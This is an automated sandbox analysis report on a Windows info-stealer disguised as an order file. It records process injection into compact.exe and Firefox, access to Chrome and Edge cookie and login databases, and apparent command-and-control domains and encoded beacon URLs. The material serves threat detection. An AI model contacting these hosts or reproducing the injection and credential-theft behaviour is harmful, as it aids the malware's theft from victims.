Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Windows Analysis Report spec 4008670601 AZTEK Order.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
spec 4008670601 AZTEK Order.exe

Malware Threat Intel
Provided by

Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Queries volume information: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.18.19	ghs.google.com	United States	15169	GOOGLEUS	false
144.208.124.10	superunicornpalace.com	United States	395092	SHOCK-1US	false
64.190.62.22	www.hondamechanic.today	United States	11696	NBS11696US	false
203.161.49.220	www.hellokong.xyz	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
208.91.197.13	www.mengistiebethlehem.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
162.43.101.114	www.tedjp-x.com	United States	11333	CYBERTRAILSUS	false
217.160.0.84	www.architect-usschool.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
89.31.76.10	sitestudio.it	Italy	24994	GENESYS-ASIT	false
188.114.96.3	www.ad14.fun	European Union	13335	CLOUDFLARENETUS	false
45.113.122.18	3cubesinterior.in	India	394695	PUBLIC-DOMAIN-REGISTRYUS	false
192.185.208.8	epicbazaarhub.com	United States	46606	UNIFIEDLAYER-AS-1US	false
121.254.178.230	www.rz6grmvv.shop	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false

Name	Malicious	Antivirus Detection	Reputation
http://www.hellokong.xyz/oui5/	false	Avira URL Cloud: safe	unknown
http://www.architect-usschool.com/s24g/	false	Avira URL Cloud: malware	unknown
http://www.hondamechanic.today/pv57/?7Dihs8p=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Bp=2LpD8tLh	false	Avira URL Cloud: safe	unknown
http://www.rz6grmvv.shop/wvam/?Bp=2LpD8tLh&7Dihs8p=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4=	false	Avira URL Cloud: safe	unknown
http://www.hellokong.xyz/oui5/?7Dihs8p=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Bp=2LpD8tLh	false	Avira URL Cloud: safe	unknown
http://www.epicbazaarhub.com/2769/	false	Avira URL Cloud: safe	unknown
http://www.architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=	false	Avira URL Cloud: malware	unknown
http://www.hondamechanic.today/pv57/	false	Avira URL Cloud: safe	unknown
http://www.tedjp-x.com/rxdf/?7Dihs8p=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Bp=2LpD8tLh	false	Avira URL Cloud: safe	unknown
http://www.ad14.fun/oc7s/?Bp=2LpD8tLh&7Dihs8p=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0=	false	Avira URL Cloud: safe	unknown
http://www.tedjp-x.com/rxdf/	false	Avira URL Cloud: safe	unknown
http://www.rz6grmvv.shop/wvam/	false	Avira URL Cloud: safe	unknown
http://www.fondazionegtech.org/jmiz/?Bp=2LpD8tLh&7Dihs8p=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do=	false	Avira URL Cloud: safe	unknown
http://www.3cubesinterior.in/n8zi/	false	Avira URL Cloud: safe	unknown
http://www.superunicornpalace.com/mwa4/	false	Avira URL Cloud: safe	unknown
http://www.easybackpage.net/3jr0/?7Dihs8p=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Bp=2LpD8tLh	false	Avira URL Cloud: safe	unknown
http://www.3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=	false	Avira URL Cloud: safe	unknown
http://www.mengistiebethlehem.com/92z0/	false	Avira URL Cloud: safe	unknown
http://www.artvectorcraft.store/s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLh	false	Avira URL Cloud: safe	unknown
http://www.mengistiebethlehem.com/92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLh	false	Avira URL Cloud: safe	unknown
http://www.easybackpage.net/3jr0/	false	Avira URL Cloud: safe	unknown
http://www.artvectorcraft.store/s0j2/	false	Avira URL Cloud: safe	unknown
http://www.ad14.fun/oc7s/	false	Avira URL Cloud: safe	unknown

ID:	1467079
Product:	CloudBasic
Start time:	17:49:18
Start date:	03.07.2024
Sample:	spec 4008670601 AZTEK Order.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	f07575dcccaa8b88972464b50b63b017
SHA1:	7949418fc5d9d6fd76c1d0349fc8dce96d777e1d
SHA256:	6ce9c6e014f84badeec8435e6e781fbde6946dc45b627aff3a307e4dee1f0934
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spec 4008670601 AZTEK Order.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	68CB8F49FDE7FC3DF6CEE19CB730C7F8	1EC425657E358C85CA4A3A04E6525E29B59FCB16	5DA91A846188B8604BEE0056451D6185AA1B91646196C90699ADFF530F8BC555
